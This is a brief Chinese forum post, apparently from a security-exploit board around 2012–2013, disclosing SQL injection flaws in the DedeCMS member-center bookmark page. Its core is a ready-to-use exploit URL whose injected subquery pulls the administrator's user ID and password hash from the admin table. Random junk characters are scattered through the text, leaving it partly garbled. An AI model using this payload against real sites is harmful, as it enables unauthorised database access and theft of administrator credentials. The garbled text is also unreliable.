DedeCMS会员中心SQL注射漏洞" n3 @4 [) A" O- O* G* a9 ~2 U N
需要magic_quotes_gpc = Off
4 }) W+ a( `; ?3 k会员登录后可以执行SQL语句查询数据库任意内容如管理员密码., o- F: P; y3 i5 k
2 W" T. r( F* c9 {; j& Q0 _DedeCMS会员中心书签管理SQL注射漏洞
4 |9 D4 d0 k0 o' C! T% p成功利用该漏洞可获得管理员密码5 O* A% H% B0 W
& K1 q( t3 Q. F1 t9 ?+ C
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码
9 F0 k$ ? d* S1 ?5 O. r# Y' l
- w* W0 n* [- N( e$ K: d3 @http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r& H3 j; l5 i5 y' u0 j5 o
|
发表于 2012-12-31 09:21:18
收藏
支持
反对
发表于 2013-1-10 01:33:59